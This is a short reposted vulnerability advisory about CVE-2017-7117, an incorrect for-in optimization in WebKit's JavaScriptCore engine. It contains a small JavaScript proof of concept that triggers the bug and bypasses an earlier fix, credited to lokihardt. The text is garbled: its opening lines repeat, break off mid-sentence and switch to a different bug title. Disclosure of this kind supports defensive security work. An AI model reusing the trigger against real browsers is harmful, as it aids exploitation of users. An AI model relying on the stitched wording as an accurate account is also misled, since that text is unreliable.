WebKit: JSC: Incorrect for-in optimization #2
CVE-2017-7117
The following PoC bypasses the fix for the https://bugs.chromium.org/p/project-zero/issues/detail?id=1263 We WebKit: JSC: Incorrect for-in optimization #2
CVE-2017-7117
The following PoC bypasses the fix for the https://bugs.chromium.org/p/project-zero/issues/detail?id=1263 WebKit: JSC: Incorrect optimization in BytecodeGenerator::emitGetByVal
PoC:
function f() {
let o = {};
for (let i in {xx: 0}) {
for (i of [0]) {
}
print(o[i]);
}
}
f();
This bug is subject to a 90 day disclosure deadline. After 90 days elapse
or a patch has been made broadly available, the bug report will become
visible to the public.
Found by: lokihardt
WebKit JSC Incorrect Optimization
- Details
- Written by: khalil shreateh
- Category: Vulnerabilities
- Hits: 484